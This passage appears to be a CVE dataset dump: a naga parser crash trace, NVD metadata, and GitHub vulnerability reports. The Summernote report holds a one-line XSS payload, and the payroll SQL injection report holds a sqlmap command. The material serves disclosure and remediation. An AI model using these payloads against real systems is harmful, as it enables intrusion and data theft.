naga::front::wgsl::parse::Parser::general_expression_with_span::_$u7b$$u7b$closure$u7d$$u7d$::_$u7b$$u7b$closure$u7d$$u7d$::_$u7b$$u7b$closure$u7d$$u7d$::_$u7b$$u7b$closure$u7d$$u7d$::_$u7b$$u7b$closure$u7d$$u7d$::h1a4180951f20a413 /src/wgpu/naga/src/front/wgsl/parse/mod.rs:923:49 #87 0x555b4f7a5049 in naga::front::wgsl::parse::ExpressionContext::parse_binary_op::h5f17ceea535d3071 /src/wgpu/naga/src/front/wgsl/parse/mod.rs:69:31 #88 0x555b4f7aa769 in naga::front::wgsl::parse::Parser::general_expression_with_span::_$u7b$$u7b$closure$u7d$$u7d$::_$u7b$$u7b$closure$u7d$$u7d$::_$u7b$$u7b$closure$u7d$$u7d$::_$u7b$$u7b$closure$u7d$$u7d$::h009cb1660fd1d197 /src/wgpu/naga/src/front/wgsl/parse/mod.rs:914:41 #89 0x555b4f7aa769 in naga::front::wgsl::parse::ExpressionContext::parse_binary_op::hdd8fd162d8ed00ff /src/wgpu/naga/src/front/wgsl/parse/mod.rs:69:31 #90 0x555b4f7a2409 in naga::front::wgsl::parse::Parser::general_expression_with_span::_$u7b$$u7b$closure$u7d$$u7d$::_$u7b$$u7b$closure$u7d$$u7d$::_$u7b$$u7b$closure$u7d$$u7d$::h55d826ced51e0164 /src/wgpu/naga/src/front/wgsl/parse/mod.rs:904:33 #91 0x555b4f7a2409 in naga::front::wgsl::parse::ExpressionContext::parse_binary_op::h35ddc307bce0ceb0 /src/wgpu/naga/src/front/wgsl/parse/mod.rs:69:31 #92 0x555b4f7a65f9 in naga::front::wgsl::parse::Parser::general_expression_with_span::_$u7b$$u7b$closure$u7d$$u7d$::_$u7b$$u7b$closure$u7d$$u7d$::h1ab282502cd47b27 /src/wgpu/naga/src/front/wgsl/parse/mod.rs:896:25 #93 0x555b4f7a65f9 in naga::front::wgsl::parse::ExpressionContext::parse_binary_op::h6e55776d754ff865 /src/wgpu/naga/src/front/wgsl/parse/mod.rs:69:31 #94 0x555b4f7a91b9 in naga::front::wgsl::parse::Parser::general_expression_with_span::_$u7b$$u7b$closure$u7d$$u7d$::h6c989bb92b53e79c /src/wgpu/naga/src/front/wgsl/parse/mod.rs:888:17 #95 0x555b4f7a91b9 in naga::front::wgsl::parse::ExpressionContext::parse_binary_op::hd580949c24cf7bb8 /src/wgpu/naga/src/front/wgsl/parse/mod.rs:69:31 #96 0x555b4f7cf542 in naga::front::wgsl::parse::Parser::general_expression_with_span::hcc90cbee76e0cc50 /src/wgpu/naga/src/front/wgsl/parse/mod.rs:880:22 #97 0x555b4f7cf542 in naga::front::wgsl::parse::Parser::general_expression::h24c377b05d599ba6 /src/wgpu/naga/src/front/wgsl/parse/mod.rs:869:9 #98 0x555b4f7c429b in naga::front::wgsl::parse::Parser::primary_expression::h746864ee7f9c87ae /src/wgpu/naga/src/front/wgsl/parse/mod.rs:618:28 #99 0x555b4f7cdba8 in naga::front::wgsl::parse::Parser::singular_expression::h5c3de80f367a39e0 /src/wgpu/naga/src/front/wgsl/parse/mod.rs:781:28 #100 0x555b4f7ca423 in naga::front::wgsl::parse::Parser::unary_expression::h684e82ebbf0571d6 /src/wgpu/naga/src/front/wgsl/parse/mod.rs:766:18 ... ... #411 0x555b4f7cf542 in naga::front::wgsl::parse::Parser::general_expression::h24c377b05d599ba6 /src/wgpu/naga/src/front/wgsl/parse/mod.rs:869:9 #412 0x555b4f7c429b in naga::front::wgsl::parse::Parser::primary_expression::h746864ee7f9c87ae /src/wgpu/naga/src/front/wgsl/parse/mod.rs:618:28 #413 0x555b4f7cdba8 in naga::front::wgsl::parse::Parser::singular_expression::h5c3de80f367a39e0 /src/wgpu/naga/src/front/wgsl/parse/mod.rs:781:28 #414 0x555b4f7ca423 in naga::front::wgsl::parse::Parser::unary_expression::h684e82ebbf0571d6 /src/wgpu/naga/src/front/wgsl/parse/mod.rs:766:18 #415 0x555b4f7a0e04 in naga::front::wgsl::parse::Parser::equality_expression::_$u7b$$u7b$closure$u7d$$u7d$::_$u7b$$u7b$closure$u7d$$u7d$::_$u7b$$u7b$closure$u7d$$u7d$::_$u7b$$u7b$closure$u7d$$u7d$::_$u7b$$u7b$closure$u7d$$u7d$::ha1ecfa7432ce2a18 /src/wgpu/naga/src/front/wgsl/parse/mod.rs:852:62 #416 0x555b4f7a0e04 in naga::front::wgsl::parse::ExpressionContext::parse_binary_op::h11097d75ca1d4c90 /src/wgpu/naga/src/front/wgsl/parse/mod.rs:69:31 #417 0x555b4f7abd37 in naga::front::wgsl::parse::Parser::equality_expression::_$u7b$$u7b$closure$u7d$$u7d$::_$u7b$$u7b$closure$u7d$$u7d$::_$u7b$$u7b$closure$u7d$$u7d$::_$u7b$$u7b$closure$u7d$$u7d$::h0b29f2891687a004 /src/wgpu/naga/src/front/wgsl/parse/mod.rs:838:41 #418 0x555b4f7abd37 in naga::front::wgsl::parse::ExpressionContext::parse_binary_op::hdfb95f1d26727453 /src/wgpu/naga/src/front/wgsl/parse/mod.rs:69:31 #419 0x555b4f79f7f4 in naga::front::wgsl::parse::Parser::equality_expression::_$u7b$$u7b$closure$u7d$$u7d$::_$u7b$$u7b$closure$u7d$$u7d$::_$u7b$$u7b$closure$u7d$$u7d$::h66c0fcfdc30242ae /src/wgpu/naga/src/front/wgsl/parse/mod.rs:827:33 #420 0x555b4f79f7f4 in naga::front::wgsl::parse::ExpressionContext::parse_binary_op::h07c27e2bbcec7139 /src/wgpu/naga/src/front/wgsl/parse/mod.rs:69:31 #421 0x555b4f7a39d0 in naga::front::wgsl::parse::Parser::equality_expression::_$u7b$$u7b$closure$u7d$$u7d$::_$u7b$$u7b$closure$u7d$$u7d$::h1ad4b0db731fddaf /src/wgpu/naga/src/front/wgsl/parse/mod.rs:814:25 #422 0x555b4f7a39d0 in naga::front::wgsl::parse::ExpressionContext::parse_binary_op::h5c45e4063eb5f655 /src/wgpu/naga/src/front/wgsl/parse/mod.rs:69:31 #423 0x555b4f7a7bc4 in naga::front::wgsl::parse::Parser::equality_expression::_$u7b$$u7b$closure$u7d$$u7d$::h111b4739c2a0ae77 /src/wgpu/naga/src/front/wgsl/parse/mod.rs:803:17 #424 0x555b4f7a7bc4 in naga::front::wgsl::parse::ExpressionContext::parse_binary_op::hc5c8f4d9459bbd82 /src/wgpu/naga/src/front/wgsl/parse/mod.rs:69:31 #425 0x555b4f7a5049 in naga::front::wgsl::parse::Parser::equality_expression::h33d0d8cf0e8fbcb6 /src/wgpu/naga/src/front/wgsl/parse/mod.rs:794:9 #426 0x555b4f7a5049 in naga::front::wgsl::parse::Parser::general_expression_with_span::_$u7b$$u7b$closure$u7d$$u7d$::_$u7b$$u7b$closure$u7d$$u7d$::_$u7b$$u7b$closure$u7d$$u7d$::_$u7b$$u7b$closure$u7d$$u7d$::_$u7b$$u7b$closure$u7d$$u7d$::h1a4180951f20a413 /src/wgpu/naga/src/front/wgsl/parse/mod.rs:923:49 #427 0x555b4f7a5049 in naga::front::wgsl::parse::ExpressionContext::parse_binary_op::h5f17ceea535d3071 /src/wgpu/naga/src/front/wgsl/parse/mod.rs:69:31 #428 0x555b4f7aa769 in naga::front::wgsl::parse::Parser::general_expression_with_span::_$u7b$$u7b$closure$u7d$$u7d$::_$u7b$$u7b$closure$u7d$$u7d$::_$u7b$$u7b$closure$u7d$$u7d$::_$u7b$$u7b$closure$u7d$$u7d$::h009cb1660fd1d197 /src/wgpu/naga/src/front/wgsl/parse/mod.rs:914:41 #429 0x555b4f7aa769 in naga::front::wgsl::parse::ExpressionContext::parse_binary_op::hdd8fd162d8ed00ff /src/wgpu/naga/src/front/wgsl/parse/mod.rs:69:31 #430 0x555b4f7a2409 in naga::front::wgsl::parse::Parser::general_expression_with_span::_$u7b$$u7b$closure$u7d$$u7d$::_$u7b$$u7b$closure$u7d$$u7d$::_$u7b$$u7b$closure$u7d$$u7d$::h55d826ced51e0164 /src/wgpu/naga/src/front/wgsl/parse/mod.rs:904:33 #431 0x555b4f7a2409 in naga::front::wgsl::parse::ExpressionContext::parse_binary_op::h35ddc307bce0ceb0 /src/wgpu/naga/src/front/wgsl/parse/mod.rs:69:31 #432 0x555b4f7a65f9 in naga::front::wgsl::parse::Parser::general_expression_with_span::_$u7b$$u7b$closure$u7d$$u7d$::_$u7b$$u7b$closure$u7d$$u7d$::h1ab282502cd47b27 /src/wgpu/naga/src/front/wgsl/parse/mod.rs:896:25 #433 0x555b4f7a65f9 in naga::front::wgsl::parse::ExpressionContext::parse_binary_op::h6e55776d754ff865 /src/wgpu/naga/src/front/wgsl/parse/mod.rs:69:31 #434 0x555b4f7a91b9 in naga::front::wgsl::parse::Parser::general_expression_with_span::_$u7b$$u7b$closure$u7d$$u7d$::h6c989bb92b53e79c /src/wgpu/naga/src/front/wgsl/parse/mod.rs:888:17 #435 0x555b4f7a91b9 in naga::front::wgsl::parse::ExpressionContext::parse_binary_op::hd580949c24cf7bb8 /src/wgpu/naga/src/front/wgsl/parse/mod.rs:69:31 #436 0x555b4f7cf542 in naga::front::wgsl::parse::Parser::general_expression_with_span::hcc90cbee76e0cc50 /src/wgpu/naga/src/front/wgsl/parse/mod.rs:880:22 #437 0x555b4f7cf542 in naga::front::wgsl::parse::Parser::general_expression::h24c377b05d599ba6 /src/wgpu/naga/src/front/wgsl/parse/mod.rs:869:9 #438 0x555b4f7c429b in naga::front::wgsl::parse::Parser::primary_expression::h746864ee7f9c87ae /src/wgpu/naga/src/front/wgsl/parse/mod.rs:618:28 #439 0x555b4f7cdba8 in naga::front::wgsl::parse::Parser::singular_expression::h5c3de80f367a39e0 /src/wgpu/naga/src/front/wgsl/parse/mod.rs:781:28 #440 0x555b4f7ca423 in naga::front::wgsl::parse::Parser::unary_expression::h684e82ebbf0571d6 /src/wgpu/naga/src/front/wgsl/parse/mod.rs:766:18 #441 0x555b4f7a0e04 in naga::front::wgsl::parse::Parser::equality_expression::_$u7b$$u7b$closure$u7d$$u7d$::_$u7b$$u7b$closure$u7d$$u7d$::_$u7b$$u7b$closure$u7d$$u7d$::_$u7b$$u7b$closure$u7d$$u7d$::_$u7b$$u7b$closure$u7d$$u7d$::ha1ecfa7432ce2a18 /src/wgpu/naga/src/front/wgsl/parse/mod.rs:852:62 #442 0x555b4f7a0e04 in naga::front::wgsl::parse::ExpressionContext::parse_binary_op::h11097d75ca1d4c90 /src/wgpu/naga/src/front/wgsl/parse/mod.rs:69:31 #443 0x555b4f7abd37 in naga::front::wgsl::parse::Parser::equality_expression::_$u7b$$u7b$closure$u7d$$u7d$::_$u7b$$u7b$closure$u7d$$u7d$::_$u7b$$u7b$closure$u7d$$u7d$::_$u7b$$u7b$closure$u7d$$u7d$::h0b29f2891687a004 /src/wgpu/naga/src/front/wgsl/parse/mod.rs:838:41 #444 0x555b4f7abd37 in naga::front::wgsl::parse::ExpressionContext::parse_binary_op::hdfb95f1d26727453 /src/wgpu/naga/src/front/wgsl/parse/mod.rs:69:31 #445 0x555b4f79f7f4 in naga::front::wgsl::parse::Parser::equality_expression::_$u7b$$u7b$closure$u7d$$u7d$::_$u7b$$u7b$closure$u7d$$u7d$::_$u7b$$u7b$closure$u7d$$u7d$::h66c0fcfdc30242ae /src/wgpu/naga/src/front/wgsl/parse/mod.rs:827:33 #446 0x555b4f79f7f4 in naga::front::wgsl::parse::ExpressionContext::parse_binary_op::h07c27e2bbcec7139 /src/wgpu/naga/src/front/wgsl/parse/mod.rs:69:31 #447 0x555b4f7a39d0 in naga::front::wgsl::parse::Parser::equality_expression::_$u7b$$u7b$closure$u7d$$u7d$::_$u7b$$u7b$closure$u7d$$u7d$::h1ad4b0db731fddaf /src/wgpu/naga/src/front/wgsl/parse/mod.rs:814:25 #448 0x555b4f7a39d0 in naga::front::wgsl::parse::ExpressionContext::parse_binary_op::h5c45e4063eb5f655 /src/wgpu/naga/src/front/wgsl/parse/mod.rs:69:31 #449 0x555b4f7a7bc4 in naga::front::wgsl::parse::Parser::equality_expression::_$u7b$$u7b$closure$u7d$$u7d$::h111b4739c2a0ae77 /src/wgpu/naga/src/front/wgsl/parse/mod.rs:803:17 #450 0x555b4f7a7bc4 in naga::front::wgsl::parse::ExpressionContext::parse_binary_op::hc5c8f4d9459bbd82 /src/wgpu/naga/src/front/wgsl/parse/mod.rs:69:31 #451 0x555b4f7a5049 in naga::front::wgsl::parse::Parser::equality_expression::h33d0d8cf0e8fbcb6 /src/wgpu/naga/src/front/wgsl/parse/mod.rs:794:9 #452 0x555b4f7a5049 in naga::front::wgsl::parse::Parser::general_expression_with_span::_$u7b$$u7b$closure$u7d$$u7d$::_$u7b$$u7b$closure$u7d$$u7d$::_$u7b$$u7b$closure$u7d$$u7d$::_$u7b$$u7b$closure$u7d$$u7d$::_$u7b$$u7b$closure$u7d$$u7d$::h1a4180951f20a413 /src/wgpu/naga/src/front/wgsl/parse/mod.rs:923:49 #453 0x555b4f7a5049 in naga::front::wgsl::parse::ExpressionContext::parse_binary_op::h5f17ceea535d3071 /src/wgpu/naga/src/front/wgsl/parse/mod.rs:69:31 #454 0x555b4f7aa769 in naga::front::wgsl::parse::Parser::general_expression_with_span::_$u7b$$u7b$closure$u7d$$u7d$::_$u7b$$u7b$closure$u7d$$u7d$::_$u7b$$u7b$closure$u7d$$u7d$::_$u7b$$u7b$closure$u7d$$u7d$::h009cb1660fd1d197 /src/wgpu/naga/src/front/wgsl/parse/mod.rs:914:41 #455 0x555b4f7aa769 in naga::front::wgsl::parse::ExpressionContext::parse_binary_op::hdd8fd162d8ed00ff /src/wgpu/naga/src/front/wgsl/parse/mod.rs:69:31 #456 0x555b4f7a2409 in naga::front::wgsl::parse::Parser::general_expression_with_span::_$u7b$$u7b$closure$u7d$$u7d$::_$u7b$$u7b$closure$u7d$$u7d$::_$u7b$$u7b$closure$u7d$$u7d$::h55d826ced51e0164 /src/wgpu/naga/src/front/wgsl/parse/mod.rs:904:33 #457 0x555b4f7a2409 in naga::front::wgsl::parse::ExpressionContext::parse_binary_op::h35ddc307bce0ceb0 /src/wgpu/naga/src/front/wgsl/parse/mod.rs:69:31 SUMMARY: AddressSanitizer: stack-overflow /src/wgpu/naga/src/front/wgsl/parse/mod.rs in naga::front::wgsl::parse::ExpressionContext::parse_binary_op::hdfb95f1d26727453 ==132416==ABORTING ``` Attached is the test sample. [crash.zip](https://github.com/gfx-rs/naga/files/15470741/crash.zip)
A stack overflow vulnerability was found
https://api.github.com/repos/gfx-rs/naga/issues/2591/comments
1
2024-05-28T13:48:42Z
2024-05-31T08:38:21Z
https://github.com/gfx-rs/naga/issues/2591
2,321,122,927
2,591
6,062
CVE-2024-5898
2024-06-12T17:15:52.577
A vulnerability was found in itsourcecode Payroll Management System 1.0 and classified as critical. Affected by this issue is some unknown functionality of the file print_payroll.php. The manipulation of the argument id leads to sql injection. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. VDB-268142 is the identifier assigned to this vulnerability.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "SINGLE", "availabilityImpact": "PARTIAL", "baseScore": 6.5, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P", "version": "2.0" }, "exploitabilityScore": 8, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "cna@vuldb.com", "type": "Secondary", "userInteractionRequired": false } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "LOW", "baseScore": 6.3, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "privilegesRequired": "LOW", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L", "version": "3.1" }, "exploitabilityScore": 2.8, "impactScore": 3.4, "source": "cna@vuldb.com", "type": "Secondary" }, { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 9.8, "baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 5.9, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": [ { "cvssData": { "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "Safety": "NOT_DEFINED", "attackComplexity": "LOW", "attackRequirements": "NONE", "attackVector": "NETWORK", "availabilityRequirement": "NOT_DEFINED", "baseScore": 5.3, "baseSeverity": "MEDIUM", "confidentialityRequirement": "NOT_DEFINED", "exploitMaturity": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "privilegesRequired": "LOW", "providerUrgency": "NOT_DEFINED", "subAvailabilityImpact": "NONE", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "userInteraction": "NONE", "valueDensity": "NOT_DEFINED", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "version": "4.0", "vulnAvailabilityImpact": "LOW", "vulnConfidentialityImpact": "LOW", "vulnIntegrityImpact": "LOW", "vulnerabilityResponseEffort": "NOT_DEFINED" }, "source": "cna@vuldb.com", "type": "Secondary" } ] }
[ { "source": "cna@vuldb.com", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/guiyxli/cve/issues/1" }, { "source": "cna@vuldb.com", "tags": [ "Permissions Required", "Third Party Advisory" ], "url": "https://vuldb.com/?ctiid.268142" }, { "source": "cna@vuldb.com", "tags": [ "Third Party Advisory" ], "url": "https://vuldb.com/?id.268142" }, { "source": "cna@vuldb.com", "tags": [ "Third Party Advisory" ], "url": "https://vuldb.com/?submit.354926" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/guiyxli/cve/issues/1" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Permissions Required", "Third Party Advisory" ], "url": "https://vuldb.com/?ctiid.268142" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory" ], "url": "https://vuldb.com/?id.268142" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory" ], "url": "https://vuldb.com/?submit.354926" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:angeljudesuarez:payroll_management_system:1.0:*:*:*:*:*:*:*", "matchCriteriaId": "20FC2EF9-5A2B-4173-8F3B-34B209DA6A10", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "89" ]
89
https://github.com/guiyxli/cve/issues/1
[ "Exploit", "Third Party Advisory" ]
github.com
[ "guiyxli", "cve" ]
# Itsourcecode Payroll Management System Project In PHP With Source Code v1.0 print_payroll.php SQL injection # NAME OF AFFECTED PRODUCT(S) + Payroll Management System Project In PHP With Source Code ## Vendor Homepage + https://itsourcecode.com/free-projects/php-project/payroll-system-php/ # AFFECTED AND/OR FIXED VERSION(S) ## submitter + netcat ## Vulnerable File + print_payroll.php ## VERSION(S) + V1.0 ## Software Link + https://itsourcecode.com/wp-content/uploads/2021/03/Payroll-Management-System-Project-In-PHP-Source-Code.zip # PROBLEM TYPE ## Vulnerability Type + SQL injection ## Root Cause + A SQL injection vulnerability was found in the 'print_payroll.php' file of the 'Payroll Management System Project In PHP With Source Code' project. The reason for this issue is that attackers inject malicious code from the parameter "id" and use it directly in SQL queries without appropriate cleaning or validation. This allows attackers to forge input values, thereby manipulating SQL queries and performing unauthorized operations. <img width="632" alt="1" src="https://github.com/guiyxli/cve/assets/98604922/2a36f33c-cd8e-4690-a995-b6af5d222173"> ## Impact + Attackers can exploit this SQL injection vulnerability to achieve unauthorized database access, sensitive data leakage, data tampering, comprehensive system control, and even service interruption, posing a serious threat to system security and business continuity. # DESCRIPTION + Due to insufficient user input validation for the "id" parameter, a serious SQL injection vulnerability was discovered in the login function of the "Payroll Management System Project In PHP", allowing attackers to inject malicious SQL queries. Therefore, attackers can gain unauthorized access to the database, modify or delete data, and access sensitive information without logging in. Immediate remedial measures are needed to ensure system security and protect data integrity. # Vulnerability details and POC ## Vulnerability type: + time-based blind + boolean-based blind + error-based + UNION query ## Vulnerability location: + 'id' parameter ## Payload: <img width="966" alt="2" src="https://github.com/guiyxli/cve/assets/98604922/43f23f5b-7b3c-4521-bf62-4ca0e4f9e277"> ## The following are screenshots of some specific information obtained from testing and running with the sqlmap tool: ```bash sqlmap -u "http://192.168.210.199:1214/print_payroll.php?id=10" --batch --dbs ``` <img width="615" alt="3" src="https://github.com/guiyxli/cve/assets/98604922/235d3ade-a7e4-4198-ab0b-3ccbc2b5fd1e"> # Suggested repair 1. **Use prepared statements and parameter binding:** Preparing statements can prevent SQL injection as they separate SQL code from user input data. When using prepare statements, the value entered by the user is treated as pure data and will not be interpreted as SQL code. 2. **Input validation and filtering:** Strictly validate and filter user input data to ensure it conforms to the expected format. 3. **Minimize database user permissions:** Ensure that the account used to connect to the database has the minimum necessary permissions. Avoid using accounts with advanced permissions (such as' root 'or' admin ') for daily operations. 4. **Regular security audits:** Regularly conduct code and system security audits to promptly identify and fix potential security vulnerabilities.
Itsourcecode Payroll Management System Project In PHP With Source Code v1.0 print_payroll.php SQL injection
https://api.github.com/repos/guiyxli/cve/issues/1/comments
0
2024-06-12T02:46:13Z
2024-06-12T02:46:13Z
https://github.com/guiyxli/cve/issues/1
2,347,680,282
1
6,063
CVE-2024-37629
2024-06-12T18:15:12.293
SummerNote 0.8.18 is vulnerable to Cross Site Scripting (XSS) via the Code View Function.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 6.1, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "privilegesRequired": "NONE", "scope": "CHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "version": "3.1" }, "exploitabilityScore": 2.8, "impactScore": 2.7, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking" ], "url": "https://github.com/summernote/summernote/issues/4642" }, { "source": "cve@mitre.org", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://grumpz.net/cve-2024-37629-simple-xss-payload-exploits-0day-vulnerability-in-10000-web-apps" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking" ], "url": "https://github.com/summernote/summernote/issues/4642" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://grumpz.net/cve-2024-37629-simple-xss-payload-exploits-0day-vulnerability-in-10000-web-apps" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:summernote:summernote:0.8.18:*:*:*:*:*:*:*", "matchCriteriaId": "D350F186-13E4-441E-9F5A-93A720A12C74", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "79" ]
79
https://github.com/summernote/summernote/issues/4642
[ "Exploit", "Issue Tracking" ]
github.com
[ "summernote", "summernote" ]
### Checklist - [X] I've looked at the [documentation](https://summernote.org/deep-dive/) to make sure the behavior isn't documented and expected. - [X] I'm sure this is an issue with Summernote, not with my app or other dependencies (Angular, Cordova, React, etc.). - [X] I've searched through the [current issues](https://github.com/summernote/summernote/issues) to make sure this hasn't been reported yet. - [X] My issue is pertinent to this repository of Summernote (jQuery), or I was unable to have my issue resolved from the relevant version I'm using, such as [Angular](https://github.com/summernote/angular-summernote), [dJango](https://github.com/summernote/django-summernote), [Rails](https://github.com/summernote/summernote-rails) or [React](https://github.com/summernote/react-summernote). Please try your issue at the relevent repository first. - [X] I understand that issues without interaction for more than 14 days (2 weeks), may be closed at our discretion. We do this, as sometimes issues are abandoned. We may at our discretion, add issues to the relevant project to be looked at, or for maintainers to work through as time permits. This is to help keep issues relevant to the current version of Summernote, and to reduce clutter. - [X] I agree to follow the [Code of Conduct](https://github.com/summernote/summernote/blob/develop/.github/CODE_OF_CONDUCT.md) that this project adheres to. ### Steps to reproduce For POC purposes, I tested this on the editor running on the main page at https://summernote.org Navigate to https://summernote.org Next click on the **Code View** button, and input the following XSS payload: `<details/open/ontoggle=prompt(origin)>` ![summerNote-XSS2](https://github.com/summernote/summernote/assets/80599694/022b532e-1b2e-43e8-b111-41f7162faadd) When you click on the **Code View** button, you will see that our XSS payload executes successfully showing DOM access. ![summerNote-XSS](https://github.com/summernote/summernote/assets/80599694/84755540-0abd-48f3-b6cc-f48626cc7e38) ### Expected behavior Most editors will sanitize the user input to avoid allowing the user to execute unintended malicious JavaScript code, such as CKEditor, Tiny MCE, to name a few examples ### Current behavior We are able to able inject malicious XSS payloads which reach the DOM and are able to execute malicious JavaScript code due to no sanitization on the **Code View** function. **Note:** There are various users of Summernote who are always vulnerable to systemic persistent XSS issues in the web application due to the summernote editor being used to handle user input formatting. One example being a recently published CVE-2024-34241, more information can be found on my blog post: https://grumpz.net/cve-2024-34241-a-step-by-step-discovery-guide ### Minimal example reproducing the issue _No response_ ### Environment - Summernote version: 0.8.18+ - Browser (with version): Firefox and Chrome - OS/Platform (with version): Ubuntu 22
XSS Discovered in The Code View Function - Version 0.8.18+
https://api.github.com/repos/summernote/summernote/issues/4642/comments
2
2024-05-30T06:28:28Z
2024-10-01T10:05:54Z
https://github.com/summernote/summernote/issues/4642
2,324,814,414
4,642
6,064
CVE-2024-37849
2024-06-13T14:15:13.300
A SQL Injection vulnerability in itsourcecode Billing System 1.0 allows a local attacker to execute arbitrary code in process.php via the username parameter.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 9.8, "baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 5.9, "source": "nvd@nist.gov", "type": "Primary" }, { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 9.8, "baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 5.9, "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/ganzhi-qcy/cve/issues/3" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/ganzhi-qcy/cve/issues/3" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:itsourcecode:billing_system:1.0:*:*:*:*:*:*:*", "matchCriteriaId": "8E8F33BD-6CFA-4C5D-8E2A-F9E35CE5E818", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "89" ]
89
https://github.com/ganzhi-qcy/cve/issues/3
[ "Exploit", "Third Party Advisory" ]
github.com
[ "ganzhi-qcy", "cve" ]
